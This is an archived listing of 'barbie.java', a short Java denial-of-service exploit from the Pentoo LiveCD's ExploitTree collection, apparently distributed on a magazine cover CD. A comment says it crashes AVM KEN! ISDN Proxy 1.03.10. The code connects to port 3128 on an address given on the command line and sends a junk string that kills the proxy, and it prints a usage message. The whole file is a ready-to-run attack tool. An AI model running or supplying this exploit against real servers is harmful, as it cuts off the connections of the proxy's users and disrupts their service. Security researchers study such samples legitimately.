home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / proxy / avmken / barbie.java.txt < prev   
Text File  |  2005-02-12  |  956b  |  49 lines

  1. import java.net.Socket;
  2. import java.io.*;
  3.  
  4. /*
  5. BARBIE - The AVM KEN! exploit
  6.  
  7. This exploit causes a crash in the AVM KEN! ISDN Proxy software.
  8. All conections will be cut off, but the server will restart again, 
  9. a few seconds later.
  10.  
  11. Tested with AVM KEN! Version 1.03.10 (german)
  12. */
  13.  
  14. class barbie {
  15.  
  16. String adress;
  17.  
  18. public void killken() { 
  19. PrintWriter out = null;
  20. try{
  21.     Socket connection = new Socket( adress, 3128);
  22.     System.out.println("");
  23.     System.out.println("killing..."); 
  24.     out  = new PrintWriter(connection.getOutputStream(), true);
  25.     out.println("Whooopppss_Ken_died");
  26.     connection.close();
  27.    }
  28. catch (IOException e)
  29. {
  30. System.out.println("");
  31. System.out.println(" Can't met Ken! ");
  32. }  
  33. }
  34.  
  35.  
  36. public static void main (String arguments[]) {
  37. barbie kk = new barbie();
  38. if(arguments.length < 1)
  39. {
  40. System.out.println("");
  41. System.out.println("usage: java barbie <adress/ip>");
  42. System.exit(1);
  43. }
  44. kk.adress = arguments[0];
  45. kk.killken();
  46. }
  47.  
  48. }
  49.